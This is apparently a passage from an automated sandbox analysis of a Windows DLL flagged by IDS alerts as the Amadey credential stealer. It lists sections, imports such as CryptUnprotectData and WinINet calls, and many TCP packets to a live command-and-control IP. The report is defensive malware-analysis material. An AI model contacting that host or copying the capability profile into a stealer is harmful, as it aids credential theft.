                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xe22380xe240099e5affc3acaef7d2e352e81d4b2f84cFalse0.48959556284530387data6.619746825575559IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0xe40000x1a28e0x1a400c3d4b18b9adf0d3cbf4e53cc6e8db32dFalse0.49518229166666666data6.005708486260768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xff0000x8f6c0x2e00a80936aea980d02aa77ce23333f781a4False0.16542119565217392data2.7385220211772183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x1080000xf80x20085aa289043231b7c2569f657c5abeefeFalse0.3359375data2.5259174608280497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x1090000x65940x660009201ee0b3ef9165a1f0602fb5a08b17False0.7370174632352942data6.676014162786475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x1080600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793

                              Imports

                              DLLImport
                              CRYPT32.dllCryptUnprotectData
                              KERNEL32.dllGetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, WaitForSingleObject, CreateFileW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, Sleep, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, CloseHandle, GetSystemInfo, LoadLibraryW, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, CreateFileMappingA, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, GetCurrentProcessId, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, SetHandleInformation, FindFirstFileA, Wow64DisableWow64FsRedirection, K32GetModuleFileNameExW, FindNextFileA, CreatePipe, PeekNamedPipe, lstrlenA, FindClose, GetCurrentDirectoryA, lstrcatA, OpenProcess, SetCurrentDirectoryA, CreateToolhelp32Snapshot, ProcessIdToSessionId, CopyFileA, Wow64RevertWow64FsRedirection, Process32NextW, Process32FirstW, CreateThread, CreateProcessA, CreateDirectoryA, ReadConsoleW, InitializeCriticalSection, LeaveCriticalSection, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, EnterCriticalSection, HeapFree, HeapCreate, TryEnterCriticalSection, ReadFile, AreFileApisANSI, SetFilePointer, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetStdHandle, GetCurrentDirectoryW, GetStdHandle, GetTimeZoneInformation, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, LCMapStringEx, InitializeCriticalSectionEx, EncodePointer, DecodePointer, CompareStringEx, GetCPInfo, GetStringTypeW, RaiseException, InterlockedFlushSList, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleFileNameW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, WriteConsoleW
                              ADVAPI32.dllGetSidSubAuthority, RegEnumValueW, RegEnumKeyA, RegCloseKey, RegQueryInfoKeyW, RegOpenKeyA, RegQueryValueExA, GetSidSubAuthorityCount, RegOpenKeyExA, GetUserNameA, RegEnumKeyExW, LookupAccountNameA, GetSidIdentifierAuthority
                              SHELL32.dllSHFileOperationA, SHGetFolderPathA
                              WININET.dllHttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, HttpAddRequestHeadersA, HttpSendRequestExW, HttpEndRequestA, InternetOpenW, InternetWriteFile
                              bcrypt.dllBCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptDecrypt

                              Exports

                              NameOrdinalAddress
                              Main10x100afc10
                              Save20x100045b0

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-27T17:47:06.264568+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449731185.215.113.21780TCP
                              2024-10-27T17:47:06.286598+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449730185.215.113.21780TCP
                              2024-10-27T17:47:12.415664+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449732185.215.113.21780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 27, 2024 17:47:05.248836994 CET4973080192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:05.250303984 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:05.254503965 CET8049730185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:05.254626989 CET4973080192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:05.254812002 CET4973080192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:05.255683899 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:05.255920887 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:05.255920887 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:05.260236025 CET8049730185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:05.261353970 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:06.264381886 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:06.264568090 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:06.286526918 CET8049730185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:06.286597967 CET4973080192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:11.377130032 CET4973280192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:11.382606030 CET8049732185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:11.382730007 CET4973280192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:11.382829905 CET4973280192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:11.388154984 CET8049732185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:12.415534973 CET8049732185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:12.415663958 CET4973280192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432248116 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432476044 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432559013 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432637930 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432687998 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432775021 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432797909 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432848930 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432912111 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.432952881 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433193922 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433224916 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433274031 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433305979 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433361053 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433361053 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433423996 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433471918 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433471918 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433507919 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433644056 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433687925 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433738947 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433816910 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433895111 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433952093 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.433995962 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434078932 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434142113 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434156895 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434206009 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434238911 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434442043 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434477091 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434540987 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434540987 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434598923 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434632063 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434659958 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434726000 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434726000 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434865952 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434895039 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.434930086 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435018063 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435075045 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435091019 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435169935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435239077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435239077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435317993 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435354948 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435427904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435427904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435491085 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435688972 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435731888 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435795069 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435795069 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435834885 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435897112 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435897112 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435961962 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.435962915 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436037064 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436152935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436175108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436264038 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436348915 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436348915 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436454058 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436487913 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436568022 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436618090 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436630011 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436671972 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436717987 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436883926 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.436995983 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437009096 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437081099 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437081099 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437119961 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437167883 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437218904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437237978 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437350988 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437407017 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437469959 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437516928 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437552929 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437592030 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437697887 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437722921 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437736988 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.437784910 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.437807083 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437849998 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437886000 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437932968 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.437973976 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438007116 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438035965 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438101053 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438128948 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438158989 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438193083 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438225031 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438230991 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438241005 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438261986 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438286066 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438288927 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438352108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438352108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438395023 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438535929 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438561916 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438635111 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438711882 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438711882 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438793898 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438829899 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438920021 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438945055 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438999891 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439018965 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439065933 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439120054 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439317942 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439367056 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439394951 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439459085 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439459085 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439503908 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439546108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439596891 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439694881 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439743996 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439790010 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439867020 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439897060 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439944983 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440051079 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440052032 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440099955 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440258980 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440258980 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440337896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440337896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440680027 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440731049 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440764904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440875053 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440892935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440892935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440892935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440892935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440908909 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440946102 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441041946 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441054106 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441091061 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441127062 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441139936 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.443124056 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443152905 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443178892 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443228006 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443255901 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443284035 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443310976 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443358898 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443386078 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443434000 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443461895 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443541050 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443567991 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443594933 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443623066 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443681955 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443710089 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443737984 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443789959 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443816900 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443844080 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443891048 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443917036 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.444005013 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.444067955 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.444094896 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445997000 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446022987 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446060896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446060896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446091890 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446122885 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446199894 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446233988 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446233988 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446239948 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446259022 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446285963 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446335077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446335077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446388006 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446388006 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447261095 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447338104 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447365046 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447427034 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447427034 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447494030 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447494030 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447545052 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447585106 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447612047 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447691917 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447787046 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447834969 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447937965 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447962046 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448002100 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448081017 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448112011 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448152065 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448203087 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448235035 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448280096 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448328972 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448379040 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448379040 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448381901 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448410988 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448437929 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448465109 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448493004 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448520899 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448546886 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448596954 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448623896 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448652983 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448662996 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448745966 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448745966 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448788881 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448821068 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448875904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448875904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448916912 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448941946 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449065924 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449120045 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449145079 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449244976 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449291945 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449315071 CET4973180192.168.2.4185.215.113.217
